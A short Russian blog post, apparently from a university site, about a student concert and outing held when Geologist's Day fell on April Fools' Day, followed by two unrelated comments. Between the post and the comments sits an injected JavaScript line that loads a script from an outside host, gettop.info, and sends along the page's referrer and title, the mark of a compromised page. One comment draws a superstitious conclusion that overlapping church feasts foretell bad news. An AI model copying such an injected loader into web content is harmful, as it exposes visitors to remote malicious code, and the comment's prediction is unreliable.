Анекдот



Смешной праздник

Первого апреля наша страна отмечала праздник – день геолога. В этом году он совпал с Днем Смеха. Студентами горного факультета был подготовлен праздничный концерт. Зрителям была представлена новая постановка студенческого театра «Золушка». Продолжением праздника был воскресный выход на природу, где так же звучали песни, разыгрывались сценки, проводились массовые конкурсы. Фото.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

2 comments to Смешной праздник

  • В 1930 по инициативе старейшего советского кинодраматурга Валентина Констан­тиновича Туркина был организован сценарный факультет. Этот момент совпал с преобразованием кинотехникума в ки­ноинститут. Ядро нового факультета составил контингент слу­шателей Сценарных курсов при ГТК, образованных в 1927 году.

  • PSОтец, Вы мне подкинули мысль с Благовещением и я тут глянул на Пасхалию 1985 г. (приход Горби) – так вот, отдельного праздника Благовещение в этом году также не было – оно совпало с Вербной Неделей. Такой же грустный символизм, как и в 1991. А в 1939 Благовещение вообще выпало на Страстную Пятницу – и вскоре началась 2МВ.Отсюда очень четкий Вывод – если Благовещение поглощается другим праздником/событием церковного календаря – скорее всего жди плохих новостей.